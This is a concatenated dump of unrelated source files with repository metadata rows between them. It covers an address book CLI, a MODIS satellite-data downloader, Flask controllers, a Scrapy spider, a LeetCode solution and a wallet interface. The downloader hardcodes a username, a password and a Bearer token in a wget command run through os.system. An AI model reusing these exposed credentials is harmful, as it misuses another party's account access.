    # Property pairs below expose each EMAttribuut's value: the getter
    # returns .waarde, the setter routes through set_waarde(value, owner).
    @property
    def alleMetalenOnderdelenGeaardVerbonden(self):
        """Definition still to be added for 'alle metalen onderdelen geaard&verbonden'."""
        return self._alleMetalenOnderdelenGeaardVerbonden.waarde

    @alleMetalenOnderdelenGeaardVerbonden.setter
    def alleMetalenOnderdelenGeaardVerbonden(self, value):
        self._alleMetalenOnderdelenGeaardVerbonden.set_waarde(value, owner=self)

    @property
    def alleToegangsdeurenSluitenPerfect(self):
        """Definition still to be added for 'alle toegangsdeuren sluiten perfect'."""
        return self._alleToegangsdeurenSluitenPerfect.waarde

    @alleToegangsdeurenSluitenPerfect.setter
    def alleToegangsdeurenSluitenPerfect(self, value):
        self._alleToegangsdeurenSluitenPerfect.set_waarde(value, owner=self)

    @property
    def alleVerlichtingsarmaturenFunctioneren(self):
        """Definition still to be added for 'alle verlichtingsarmaturen functioneren'."""
        return self._alleVerlichtingsarmaturenFunctioneren.waarde

    @alleVerlichtingsarmaturenFunctioneren.setter
    def alleVerlichtingsarmaturenFunctioneren(self, value):
        self._alleVerlichtingsarmaturenFunctioneren.set_waarde(value, owner=self)

    @property
    def bezoekkaartAanwezigEnIngevuld(self):
        """Definition still to be added for 'bezoekkaart aanwezig en ingevuld'."""
        return self._bezoekkaartAanwezigEnIngevuld.waarde

    @bezoekkaartAanwezigEnIngevuld.setter
    def bezoekkaartAanwezigEnIngevuld(self, value):
        self._bezoekkaartAanwezigEnIngevuld.set_waarde(value, owner=self)

    @property
    def binnenGeenSpinnenwebOngedierteZand(self):
        """Definition still to be added for 'binnen geen spinnenweb/ongedierte/zand'."""
        return self._binnenGeenSpinnenwebOngedierteZand.waarde

    @binnenGeenSpinnenwebOngedierteZand.setter
    def binnenGeenSpinnenwebOngedierteZand(self, value):
        self._binnenGeenSpinnenwebOngedierteZand.set_waarde(value, owner=self)

    @property
    def geenScheurenOpeningenInBehuizing(self):
        """Definition still to be added for 'geen scheuren/openingen in behuizing'."""
        return self._geenScheurenOpeningenInBehuizing.waarde

    @geenScheurenOpeningenInBehuizing.setter
    def geenScheurenOpeningenInBehuizing(self, value):
        self._geenScheurenOpeningenInBehuizing.set_waarde(value, owner=self)

    @property
    def geenStootStruikelgevaar(self):
        """Definition still to be added for 'geen stoot / struikelgevaar'."""
        return self._geenStootStruikelgevaar.waarde

    @geenStootStruikelgevaar.setter
    def geenStootStruikelgevaar(self, value):
        self._geenStootStruikelgevaar.set_waarde(value, owner=self)

    @property
    def geenVreemdeMaterialenAanwezig(self):
        """Definition still to be added for 'geen vreemde materialen aanwezig'."""
        return self._geenVreemdeMaterialenAanwezig.waarde

    @geenVreemdeMaterialenAanwezig.setter
    def geenVreemdeMaterialenAanwezig(self, value):
        self._geenVreemdeMaterialenAanwezig.set_waarde(value, owner=self)

    @property
    def geisoleerdeHandschInPerfecteStaat(self):
        """Definition still to be added for 'geisoleerde handsch in perfecte staat'."""
        return self._geisoleerdeHandschInPerfecteStaat.waarde

    @geisoleerdeHandschInPerfecteStaat.setter
    def geisoleerdeHandschInPerfecteStaat(self, value):
        self._geisoleerdeHandschInPerfecteStaat.set_waarde(value, owner=self)

    @property
    def indicatieplatenAanwezigOpToegangsdeur(self):
        """Definition still to be added for 'indicatieplaten aanwezig op toegangsdeur'."""
        return self._indicatieplatenAanwezigOpToegangsdeur.waarde

    @indicatieplatenAanwezigOpToegangsdeur.setter
    def indicatieplatenAanwezigOpToegangsdeur(self, value):
        self._indicatieplatenAanwezigOpToegangsdeur.set_waarde(value, owner=self)

    @property
    def isolerendSasInGoedeStaat(self):
        """Definition still to be added for 'isolerend sas in goede staat'."""
        return self._isolerendSasInGoedeStaat.waarde

    @isolerendSasInGoedeStaat.setter
    def isolerendSasInGoedeStaat(self, value):
        self._isolerendSasInGoedeStaat.set_waarde(value, owner=self)

    @property
    def kabelkelderVrijVanWater(self):
        """Definition still to be added for 'kabelkelder vrij van water'."""
        return self._kabelkelderVrijVanWater.waarde

    @kabelkelderVrijVanWater.setter
    def kabelkelderVrijVanWater(self, value):
        self._kabelkelderVrijVanWater.set_waarde(value, owner=self)

    @property
    def noodverlichtingsarmaturenFunctioneren(self):
        """Definition still to be added for 'noodverlichtingsarmaturen functioneren'."""
        return self._noodverlichtingsarmaturenFunctioneren.waarde

    @noodverlichtingsarmaturenFunctioneren.setter
    def noodverlichtingsarmaturenFunctioneren(self, value):
        self._noodverlichtingsarmaturenFunctioneren.set_waarde(value, owner=self)

    @property
    def opmerkingenOverHsCabine(self):
        """Definition still to be added for 'opmerkingen over HS cabine'."""
        return self._opmerkingenOverHsCabine.waarde

    @opmerkingenOverHsCabine.setter
    def opmerkingenOverHsCabine(self, value):
        self._opmerkingenOverHsCabine.set_waarde(value, owner=self)

    @property
    def slotenEnScharnierenInGoedeStaat(self):
        """Definition still to be added for 'sloten en scharnieren in goede staat'."""
        return self._slotenEnScharnierenInGoedeStaat.waarde

    @slotenEnScharnierenInGoedeStaat.setter
    def slotenEnScharnierenInGoedeStaat(self, value):
        self._slotenEnScharnierenInGoedeStaat.set_waarde(value, owner=self)

    @property
    def thermostaatHygrostaatFunctioneert(self):
        """Definition still to be added for 'thermostaat / hygrostaat functioneert'."""
        return self._thermostaatHygrostaatFunctioneert.waarde

    @thermostaatHygrostaatFunctioneert.setter
    def thermostaatHygrostaatFunctioneert(self, value):
        self._thermostaatHygrostaatFunctioneert.set_waarde(value, owner=self)

    @property
    def toegangVrijVanOnkruidStruikenTakken(self):
        """Definition still to be added for 'toegang vrij van onkruid/struiken/takken'."""
        return self._toegangVrijVanOnkruidStruikenTakken.waarde

    @toegangVrijVanOnkruidStruikenTakken.setter
    def toegangVrijVanOnkruidStruikenTakken(self, value):
        self._toegangVrijVanOnkruidStruikenTakken.set_waarde(value, owner=self)

    @property
    def toegangspadInGoedeStaat(self):
        """Definition still to be added for 'toegangspad in goede staat'."""
        return self._toegangspadInGoedeStaat.waarde

    @toegangspadInGoedeStaat.setter
    def toegangspadInGoedeStaat(self, value):
        self._toegangspadInGoedeStaat.set_waarde(value, owner=self)

    @property
    def verluchtingsroostersInGoedeStaat(self):
        """Definition still to be added for 'verluchtingsroosters in goede staat'."""
        return self._verluchtingsroostersInGoedeStaat.waarde

    @verluchtingsroostersInGoedeStaat.setter
    def verluchtingsroostersInGoedeStaat(self, value):
        self._verluchtingsroostersInGoedeStaat.set_waarde(value, owner=self)

    @property
    def verwarmingstoestelNietAfgedekt(self):
        """Definition still to be added for 'verwarmingstoestel niet afgedekt'."""
        return self._verwarmingstoestelNietAfgedekt.waarde

    @verwarmingstoestelNietAfgedekt.setter
    def verwarmingstoestelNietAfgedekt(self, value):
        self._verwarmingstoestelNietAfgedekt.set_waarde(value, owner=self)
| [
"david.vlaminck@mow.vlaanderen.be"
] | david.vlaminck@mow.vlaanderen.be |
6db3a6d1194dfc0eef30308a005fc669bc41abed | 8b62e8d1439c36dadc98ad5656459251acb15200 | /uncertainty/__init__.py | 23e5e6fff1b8927f5cf759b175f19bc65fc70afb | [
"Apache-2.0"
] | permissive | shuoli90/PAC-pred-set | 7a2c6d756f5d970102728160ca3b42d758e09285 | 430d9dcd0b9f444f9707cf803c5f61c318794f92 | refs/heads/main | 2023-06-27T15:57:46.807679 | 2021-07-27T01:20:52 | 2021-07-27T01:20:52 | 388,563,089 | 0 | 0 | Apache-2.0 | 2021-07-22T18:38:25 | 2021-07-22T18:38:24 | null | UTF-8 | Python | false | false | 90 | py | from uncertainty.util import *
from uncertainty.classification import TempScalingLearner
| [
"ggdons@gmail.com"
] | ggdons@gmail.com |
6494aa421e2601435495170fd63e0de75337f754 | c917004bdd665903338c3115bd6821fc7208242b | /workspace/Python3_Lesson12/src/addressbook.py | 72c17c0ef0d93d7f176663ab385f23b973ae1786 | [] | no_license | paulrefalo/Python-2---4 | 408ad018ccc8161b801031f8d15df2154c5d25cb | 049c654ed626e97d7fe2f8dc61d84c60f10d7558 | refs/heads/master | 2021-01-10T05:30:25.502795 | 2016-02-19T02:08:39 | 2016-02-19T02:08:39 | 52,054,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,734 | py | import configparser
from optparse import OptionParser
import shelve
# Read the shelve database location from the config file.
# NOTE(review): absolute Windows drive path is machine-specific.
config = configparser.RawConfigParser()
config.read('V:/workspace/Python3_Lesson12/src/addressbook.cfg')
# Path of the shelve file used as the address-book storage.
shelf_location = config.get('database', 'file')
class InvalidEmail(Exception):
    """Raised by validate_email when an address contains no '@'."""
    pass
def validate_email(email):
    """Raise InvalidEmail unless *email* contains an '@' character."""
    if '@' in email:
        return
    raise InvalidEmail("Invalid email: "+email)
def email_add(email):
    """Add *email* to the address book.

    Returns a (success, message) tuple; success is False when the address
    is already stored.  Raises InvalidEmail for malformed addresses.
    """
    validate_email(email)
    # FIX: use the shelf as a context manager so the handle is closed even
    # when an exception occurs (previously it leaked on errors).
    with shelve.open(shelf_location) as shelf:
        emails = shelf.get('emails', [])
        if email in emails:
            message = False, 'Email "%s" already in address book' % email
        else:
            emails.append(email)
            message = True, 'Email "%s" added to address book' % email
        # Reassign so the shelf persists the mutated list (writeback off).
        shelf['emails'] = emails
    return message
def email_delete(email):
    """Remove *email* from the address book.

    Returns a (success, message) tuple; success is False when the address
    was not stored.  Raises InvalidEmail for malformed addresses.
    """
    validate_email(email)
    # FIX: use the shelf as a context manager so the handle is closed even
    # when an exception occurs (previously it leaked on errors).
    with shelve.open(shelf_location) as shelf:
        emails = shelf.get('emails', [])
        try:
            # list.remove raises ValueError when the email is absent.
            emails.remove(email)
            message = True, 'Email "%s" removed from address book' % email
        except ValueError:
            message = False, 'Email "%s" was not in the address book' % email
        shelf['emails'] = emails
    return message
def email_display():
    """Return (True, text) where text lists every stored email, one per line."""
    with shelve.open(shelf_location) as shelf:
        # BUG FIX: unlike email_add/email_delete this function assumed the
        # 'emails' key existed and raised KeyError on a fresh database.
        # The with-statement also guarantees the shelf is closed on error.
        emails = shelf.get('emails', [])
    # Preserve the original format: each address followed by a newline.
    text = ''.join(email + '\n' for email in emails)
    return True, text
def main(options):
    """Dispatch the parsed command-line options to the matching operation."""
    action = options.action
    if action == 'add':
        return email_add(options.email)
    if action == 'delete':
        return email_delete(options.email)
    if options.display == True:
        return email_display()
    # No recognised option: fall through and return None, as before.
if __name__ == '__main__':
    # Ensure the shelf exists and holds an 'emails' list before any command.
    shelf = shelve.open(shelf_location)
    if 'emails' not in shelf:
        shelf['emails'] = []
    shelf.close()
    parser = OptionParser()
    parser.add_option('-a', '--action', dest="action", action="store",
                      help="requires -e option. Actions: add/delete")
    parser.add_option('-e', '--email', dest="email",
                      action="store", help="email used in the -a option")
    parser.add_option('-d', '--display', dest="display", action="store_true",
                      help="show all emails")
    (options, args) = parser.parse_args()
    #validation: -a and -e must be given together.
    if options.action and not options.email:
        parser.error("option -a requires option -e")
    elif options.email and not options.action:
        parser.error("option -e requires option -a")
    try:
        # NOTE(review): when neither -a nor -d is supplied, main() returns
        # None and the [1] subscript raises TypeError -- confirm intended.
        print(main(options)[1])
    except InvalidEmail:
        parser.error("option -e requires a valid email address")
"paul.refalo@gmail.com"
] | paul.refalo@gmail.com |
a76ce56f356f65611bcc9250aa5fdc250c9b10f9 | 0049832c5cbee4b96189b88b51653f48decde596 | /MODIS/MOD05/downloaderv2.py | eb85762e6a024cad9673678041edb0e2a034fbf1 | [] | no_license | henockmamo54/ImageFusion | 18cf27ec4a066456c0d575696fc986814d10a7e6 | 07e88b5cb1925f54b3b3659caa2abda2bf4f3a72 | refs/heads/master | 2023-06-16T12:38:07.352623 | 2021-07-19T00:52:02 | 2021-07-19T00:52:02 | 355,720,494 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 13 10:34:52 2021
@author: Henock
"""
import os
import modapsclient
from datetime import datetime
username = "hiik324"
password = "Ecology123"
startdate="2019-08-01"
enddate="2019-12-01"
north="38.22346787684907"
south="38.18195837298332"
west="127.21710138948873"
east="127.27222505323994"
product="MOD05_L2"
collection="61"
startdate_obj = datetime.strptime(startdate, '%Y-%m-%d')
path = os.path.join("./",str(startdate_obj.year))
if not os.path.exists(path):
os.mkdir(path)
a = modapsclient.ModapsClient()
products=a.searchForFiles(products=product, startTime=startdate,
endTime=enddate, north=north,south=south,
west=west,east=east, collection=collection)
print("Products count = > ",len(products))
for p in products:
url=a.getFileUrls(p)[0]
print(p,url)
cmd=('wget --user hiik324 --password Ecology123 {0} --header "Authorization: Bearer C88B2F44-881A-11E9-B4DB-D7883D88392C" -P {1} '.format( url, path))
os.system(cmd)
| [
"henockmamo54@gmail.com"
] | henockmamo54@gmail.com |
db6863c444c7ed992ab0de7afba38e1d1466433d | 0d982772c792460c3f09da170fe80b67336bd5c5 | /nsweb/controllers/analyze.py | 83611ce625aa5f6c1c62ff9f7402e909bdacada6 | [] | no_license | tziembo/neurosynth-web | bf31c3d66fe78fc908778857ebc500440a022f2e | 8642e490ab910665d8be9b3271260dec59e0c4b2 | refs/heads/master | 2021-06-27T05:50:56.512331 | 2017-08-22T05:46:51 | 2017-08-22T05:46:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,004 | py | from flask import Blueprint, render_template, redirect, url_for, request, jsonify, abort, send_file
from nsweb.models.analyses import Analysis, AnalysisImage
from nsweb.core import app, add_blueprint, db
from nsweb.initializers import settings
from nsweb.tasks import run_metaanalysis
from nsweb.controllers.images import send_nifti
from flask.helpers import url_for
import simplejson as json
from flask.ext.user import login_required, current_user
import re
import uuid
import requests
from os.path import join, basename, exists
import os
from datetime import datetime
from email.utils import parsedate
# Blueprint grouping every /analyze endpoint; registered with the app
# elsewhere (see the add_blueprint import above).
bp = Blueprint('analyze',__name__,url_prefix='/analyze')

@bp.route('/', methods=['GET'])
def index():
    """Render the analyze index template."""
    return render_template('analyze/index.html.slim')
@bp.route('/<id>/', methods=['GET', 'POST'])
def show(id):
    """Render the page for one analysis.

    The `id` URL segment is unused server-side; presumably the client-side
    code loads the data through the JSON endpoints -- TODO confirm.
    """
    return render_template('analyze/show.html.slim')
@login_required
def run():
    """Run a meta-analysis over the study ids given in the request and persist it.

    Expects an 'ids' query argument with a comma-separated list of integer
    study ids.  NOTE(review): this view has no @bp.route decorator in the
    visible source, so it is not reachable as written -- confirm.
    """
    if 'ids' not in request.args:
        abort(404)  # TODO: return sensible error message
    # Comma-separated study ids, e.g. "123,456" -- TODO confirm format
    # against the client code.
    id_string = request.args['ids']
    ids = id_string.split(',')
    result = run_metaanalysis.delay(id_string).wait()
    if result:
        # Create the Analysis record
        uid = uuid.uuid4().hex
        # BUG FIX: `name` was fetched with a default here but the Analysis
        # constructor then used request.args['name'], raising KeyError when
        # the argument was omitted; use the retrieved value instead.
        # `name` is effectively required, since it is used below to build
        # the image filenames.
        name = request.args.get('name', None)
        description = request.args.get('description', None)
        analysis = Analysis(name=name, description=description,
                            uuid=uid, ip=request.remote_addr, user=current_user)
        # Add the forward/reverse inference images produced by the task.
        image_dir = join(settings.IMAGE_DIR, 'analyses')
        analysis.images = [
            AnalysisImage(image_file=join(image_dir, name + '_pAgF_z_FDR_0.01.nii.gz'),
                          label='%s: forward inference' % name,
                          stat='z-score',
                          display=1,
                          download=1),
            AnalysisImage(image_file=join(image_dir, name + '_pFgA_z_FDR_0.01.nii.gz'),
                          label='%s: reverse inference' % name,
                          stat='z-score',
                          display=1,
                          download=1)
        ]
        db.session.add(analysis)
        db.session.commit()
        # Add studies.
        # BUG FIX: `ids` was never defined before this loop (NameError at
        # runtime); it is now parsed from the request above.
        # NOTE(review): `Inclusion` is not imported in the visible import
        # block -- confirm it is available at module level.
        for s in ids:
            db.session.add(Inclusion(analysis=analysis, study_id=int(s)))
        db.session.commit()
@bp.route('/<id>/images')
### TODO: move image retrieval from multiple controllers into a separate helper
def get_images(id):
    """Return JSON descriptors for the displayable images of an analysis."""
    analysis = Analysis.query.filter_by(uuid=id).first()
    if analysis is None:
        abort(404)
    images = []
    for img in analysis.images:
        if not img.display:
            continue
        is_reverse = 'reverse' in img.label
        images.append({
            'id': img.id,
            'name': img.label,
            'colorPalette': 'red' if is_reverse else 'blue',
            # "intent": (img.stat + ':').capitalize(),
            'url': '/images/%s' % img.id,
            'visible': 1 if is_reverse else 0,
            'download': '/images/%s' % img.id,
            'intent': 'z-score'
        })
    return jsonify(data=images)
# NOTE(review): the route is missing a leading '/' unlike the other routes
# in this blueprint -- confirm whether that is intentional.
@bp.route('<id>/studies')
def get_studies(id):
    """Unimplemented stub: 404s for unknown analyses, otherwise returns None."""
    analysis = Analysis.query.filter_by(uuid=id).first()
    if analysis is None:
        abort(404)
    # Body not yet written; returning None makes Flask raise a 500.
    pass
| [
"tyarkoni@gmail.com"
] | tyarkoni@gmail.com |
2264537e226c42fd49c2db1e815b60de5324216e | eddb5cc6ece559a21fb2d99dc03fb4b9e3e1ddb0 | /fagaiwei/fagaiwei/spiders/41dagongwang_sipder.py | 5bd0eebebe50b1f5a487bf89305864a737b1af3a | [] | no_license | KKtoNN/python_spider | a9bdd005d607b1265a556cb4908e84804c0bfc62 | c72bd061c3ca4145fef85b0fd9c15576441cdb09 | refs/heads/master | 2020-03-18T22:50:00.131802 | 2018-05-30T00:47:56 | 2018-05-30T00:47:56 | 135,367,902 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,688 | py | # coding:utf-8
import re
import time
import scrapy
from fagaiwei.items import FagaiweiItem
from fagaiwei.settings import session, NewsItemInfo
from fagaiwei.keyword_others import keyword
class xiamenSipderSpider(scrapy.Spider):
    """Spider for today's Ta Kung Pao (大公报) e-paper page index.

    Emits one FagaiweiItem per printed page ("第N版") that is not yet
    recorded in the database for this source (web_id=41); each item's URL
    points at the e-paper viewer with the page number as query string.
    """
    name = 'dagongwang_sipder'
    allowed_domains = ['takungpao.com']
    start_urls = [
        'http://news.takungpao.com/paper/list-{}.html'.format(time.strftime("%Y%m%d", time.localtime())),
    ]

    def parse(self, response):
        pub_title = '大公报'
        # Title suffix from the page header, with newlines stripped.
        # Bug fix: the original used replace('/n', '') which never matched
        # a newline character; '\n' is the intended pattern.
        data_tiitle = ''.join(list(response.xpath("//div[@class='pannel_inner01']/div//text()").getall())) \
            .replace('\n', '')
        web2 = 'http://news.takungpao.com.hk/paper/{}.html'.format(time.strftime("%Y%m%d", time.localtime()))
        url2s = response.xpath("//a[@class ='bluelink']/text()").getall()
        for url2 in url2s:
            # Robustness: skip link texts that do not name a page number
            # (the original would raise AttributeError on a non-match).
            match = re.search(r'第(\w+)版', url2)
            if match is None:
                continue
            param = match.group(1)
            url = web2 + '?' + param
            # Skip pages already stored for this source.
            result = session.query(NewsItemInfo).filter_by(url=url, web_id=41).count()
            if result:
                # print("PDF 文件地址: {} 存在".format(url))
                pass
            else:
                item = FagaiweiItem()
                item['url'] = url
                item['title'] = pub_title + data_tiitle + param
                item['content'] = '该页面为电子版报纸请点原链接查看'
                item['web'] = response.url
                item['webname'] = pub_title
                item['pub_time'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
                item["keyword"] = keyword.get_keyword(item["content"])
                item['web_id'] = 41
                yield item
| [
"18835702864@163.com"
] | 18835702864@163.com |
3cdc5787adb3028825634d327fdb2d2aa36b91b5 | 5a61ba76c770de8469218ff457213e122e08c7d1 | /code/leetcode/dynamic_programming/Solution123.py | fc2166197c3a360720c261e79b56f0cb65a9bd9a | [
"Apache-2.0"
] | permissive | zhangrong1722/interview | 6a71af26f08f036a294e36073cb9eb6ca798b993 | 187a485de0774561eb843d8ee640236adda97b90 | refs/heads/master | 2020-09-06T08:15:00.229710 | 2019-12-10T06:32:05 | 2019-12-10T06:32:05 | 220,372,777 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | class Solution:
def maxProfit(self, prices):
"""
Considering the fact we may complete at most two transactions.We can assume that first transaction is finished at i-th element.
And we just need to cosider the subarry [:i] abd [i+1: lens],where the former and the latter represent the max value for subarray[:i] and subarray[i+1:len(prices)-1]
:type prices: List[int]
:rtype: int
reference: https://leetcode.com/problems/best-time-to-buy-and-sell-stock-iii/discuss/200126/simple-c%2B%2B-DP-beats-99.66-with-explanation
"""
if len(prices) <= 1:
return 0
left = [0] * len(prices)
right = [0] * len(prices)
min_prices, max_prices = prices[0], prices[-1]
for i in range(1, len(prices)):
min_prices = min(min_prices, prices[i])
left[i] = max(prices[i]-min_prices, left[i-1])
for j in range(len(prices)-2, -1, -1):
max_prices = max(max_prices, prices[j])
right[j] = max(max_prices - prices[j], right[j+1])
results = [left[i]+right[i] for i in range(len(prices))]
return max(results) | [
"1922525328@qq.com"
] | 1922525328@qq.com |
a6f026f02000c15a466f70505538d8d0d47501fc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02264/s889112571.py | 2e212a2e0961278eca5e971a4029146c58b8aed7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from collections import deque
def process_task(task,qua, elapsed_time, complete_task):
exe_task = task.popleft()
t = int(exe_task[1])
q = int(qua)
if t-q > 0:
exe_task[1] = (t - q)
task.append(exe_task)
elapsed_time += q
else:
elapsed_time += t
complete_task.append([exe_task[0], elapsed_time])
return elapsed_time,complete_task
def main():
n,q = map(int, raw_input().split())
task = [raw_input().split() for _ in range(n)]
que = deque(task)
ela_time = 0
comp_task = []
while len(que) != 0:
ela_time , comp_task= process_task(que, q, ela_time,comp_task)
for i in comp_task:
print i[0], i[1]
#def test():
if __name__ == '__main__':
main()
#test() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b540b5f7f786c6f93344f17dad5191ffb5aa943b | f1790e298bcbf7b26cacd3c27850f243c446b9eb | /courses/python3/ch4-POO/06_lesson/encapsulation.py | 4ef417bcf9d7cecb3c934a7fb024c8b3d3026c50 | [] | no_license | misa9999/python | 36001a1bf0eb842d00b010b02e05b01aa4dfac57 | 251c5226db1bfef4a8445b025f232a27a6924930 | refs/heads/master | 2023-03-04T16:25:48.610233 | 2021-02-22T21:37:51 | 2021-02-22T21:37:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | """
public, protected, private
_ private/protected (public _)
__ private (_classname__attributename)
"""
class DataBase:
def __init__(self):
self.__data = {}
@property
def data(self):
return self.__data
def insert_customer(self, id, name):
if 'customers' not in self.__data:
self.__data['customers'] = {id: name}
else:
self.__data['customers'].update({id: name})
def show_customers(self):
for id, name in self.__data['customers'].items():
print(id, name)
def delete_customer(self, id):
del self.__data['customers'][id]
bd = DataBase()
bd.insert_customer(1, 'misa')
bd.insert_customer(2, 'lucy')
bd.insert_customer(3, 'megumin')
print(bd.data)
# bd.show_customers()
| [
"yuukixasuna00@gmailcom"
] | yuukixasuna00@gmailcom |
94de939343ae164a3702f2bf9f858e30ffc66e50 | 9276d5905d0bd4b892bccc3f3f9218124c356e59 | /tableau_view_extractor/routes.py | 0cac2c256afb2d0b2268ccd4603eb019cadb2ca2 | [] | no_license | toddbirchard/tableau-extraction | 7de813d8c547b11df13166c4bb3962b071f36602 | 0bddb8f4afe32fbef3bb6ab2c0b0076f62ca6fc4 | refs/heads/master | 2023-04-06T14:55:40.738915 | 2023-03-19T15:34:11 | 2023-03-19T15:34:11 | 162,696,737 | 19 | 2 | null | 2020-05-16T06:27:53 | 2018-12-21T09:49:26 | Python | UTF-8 | Python | false | false | 3,029 | py | import pandas as pd
from flask import Blueprint, Markup
from flask import current_app as app
from flask import render_template, request
from flask_assets import Bundle, Environment
from . import database, tableau
# Blueprint serving the Tableau-extraction UI pages.
home_blueprint = Blueprint(
    "home", __name__, template_folder="templates", static_folder="static"
)
# Flask-Assets: minify JS and compile SCSS into single bundles.
assets = Environment(app)
js = Bundle("js/*.js", filters="jsmin", output="dist/packed.js")
scss = Bundle("scss/*.scss", filters="libsass", output="dist/all.css")
assets.register("scss_all", scss)
assets.register("js_all", js)
# Build bundles eagerly at import time (cache disabled).
scss.build(force=True, disable_cache=True)
js.build(force=True, disable_cache=True)
@home_blueprint.route("/nav.jinja2", methods=["GET"])
def nav():
"""Build nav before every template render."""
tableau_view_extractor = tableau.ExtractTableauView()
xml = tableau_view_extractor.initialize_tableau_request()
token = tableau_view_extractor.get_token(xml)
all_sites = tableau_view_extractor.list_sites(token)
return render_template("nav.jinja2", all_sites=all_sites)
@home_blueprint.route("/", methods=["GET", "POST"])
def entry():
"""Homepage which lists all available views."""
tableau_view_extractor = tableau.ExtractTableauView()
xml = tableau_view_extractor.initialize_tableau_request()
token = tableau_view_extractor.get_token(xml)
site_id = tableau_view_extractor.get_site(xml, "id")
site_name = tableau_view_extractor.get_site(xml, "contentUrl")
views = tableau_view_extractor.list_views(site_id, xml, token)
all_sites = tableau_view_extractor.list_sites(token)
site = tableau_view_extractor.get_site(xml)
return render_template(
"index.jinja2",
title="Here are your views.",
template="home-template",
views=views,
token=token,
xml=xml,
site_name=site_name,
site=site,
all_sites=all_sites,
)
@home_blueprint.route("/view", methods=["GET", "POST"])
def view():
"""Display a preview of a selected view."""
site = request.args.get("site")
xml = request.args.get("xml")
view = request.args.get("view")
token = request.args.get("token")
tableau_view_extractor = tableau.ExtractTableauView()
view_df = tableau_view_extractor.get_view(site, xml, view, token)
view_df.to_csv("application/static/data/view.csv")
return render_template(
"view.jinja2",
title="Your View",
template="home-template",
view=view,
token=token,
xml=xml,
site=site,
view_df=Markup(view_df.to_html(index=False)),
)
@home_blueprint.route("/export", methods=["GET", "POST"])
def export():
"""Export view to external database."""
view_df = pd.read_csv("application/static/data/view.csv")
view_df.to_sql(
name="temp",
con=database.engine,
if_exists="replace",
chunksize=50,
index=True,
)
return render_template(
"export.jinja2",
title="Success!",
template="success-template",
)
| [
"toddbirchard@gmail.com"
] | toddbirchard@gmail.com |
be580a0a5cb16a37c9dd6cee1362c8df71b77f7d | 4495b65528bd00824a97520dee7ce22a5555ce44 | /bin/dirprinter | 48a7311fdb5989a5e1f447feede2acdc73b0498a | [] | no_license | steder/txproject | f0e7a8e57fddc454f35bc62f8273f8fb0e37f5c9 | 928d8ff40bc1b60998f6123b1b1b78f10251bf00 | refs/heads/master | 2021-01-13T02:06:45.623511 | 2015-04-13T14:17:43 | 2015-04-13T14:17:43 | 3,346,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | #!/usr/bin/env python
#-*- mode: python -*-
"""dirprinter
Pretty prints directories like this:
Example:
$ dirprinter dirname
dirname/
|-- printer.py
`-- testdir/
|-- subdir/
|-- |-- test3.txt
|-- `-- test4.txt
|-- test1.txt
`-- test2.txt
"""
import sys
from txproject import printer
from txproject import scripts
# Parse command-line options; the module docstring doubles as usage text.
parser = scripts.getDirprinterOptionsParser(__doc__)
options, args = parser.parse_args()
# Exactly one positional argument (the directory) is required.
if len(args) != 1:
    parser.error("requires a single directory name as an argument")
path = args[0]
# Pretty-print the directory tree rooted at *path*.
printer.printDirectory(path)
| [
"steder@gmail.com"
] | steder@gmail.com | |
c804374672e41fb2e779de2aa60a61a57c0ea935 | b7341581abaf2fb50e10e14911cc579e606a23d2 | /sirius_sdk/agent/wallet/abstract/non_secrets.py | a47cd8e70608d744123c602ab0e69692772ca7e1 | [
"Apache-2.0"
] | permissive | GarlonHasham/sirius-sdk-python | 3e627af6c2b3ef641b27514787fb08d0e0b30808 | 715b12c910574d78502f186aa512bc1ef5b63fbc | refs/heads/master | 2023-05-14T03:56:29.141362 | 2021-06-03T10:42:01 | 2021-06-03T10:42:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,289 | py | import json
from abc import ABC, abstractmethod
from typing import Optional, List
from sirius_sdk.base import JsonSerializable
class RetrieveRecordOptions(JsonSerializable):
def __init__(self, retrieve_type: bool=False, retrieve_value: bool=False, retrieve_tags: bool=False):
self.retrieve_type = retrieve_type
self.retrieve_value = retrieve_value
self.retrieve_tags = retrieve_tags
def check_all(self):
self.retrieve_type = True
self.retrieve_value = True
self.retrieve_tags = True
def to_json(self):
options = dict()
if self.retrieve_type:
options['retrieveType'] = self.retrieve_type
if self.retrieve_value:
options['retrieveValue'] = self.retrieve_value
if self.retrieve_tags:
options['retrieveTags'] = self.retrieve_tags
return options
def serialize(self):
return json.dumps(self.to_json())
def deserialize(self, buffer: str):
data = json.loads(buffer)
self.retrieve_type = data.get('retrieveType', False)
self.retrieve_value = data.get('retrieveValue', False)
self.retrieve_tags = data.get('retrieveTags', False)
class AbstractNonSecrets(ABC):
    """Abstract interface for non-secret (plain) wallet record storage.

    Fix: every abstract method previously did ``raise NotImplemented``,
    which raises ``TypeError: exceptions must derive from BaseException``
    (``NotImplemented`` is a comparison singleton, not an exception).
    They now raise ``NotImplementedError`` as intended.
    """

    @abstractmethod
    async def add_wallet_record(self, type_: str, id_: str, value: str, tags: dict = None) -> None:
        """
        Create a new non-secret record in the wallet

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param value: the value of record
        :param tags: the record tags used for search and storing meta information as json:
           {
             "tagName1": <str>, // string tag (will be stored encrypted)
             "tagName2": <str>, // string tag (will be stored encrypted)
             "~tagName3": <str>, // string tag (will be stored un-encrypted)
             "~tagName4": <str>, // string tag (will be stored un-encrypted)
           }
        :return: None
        """
        raise NotImplementedError

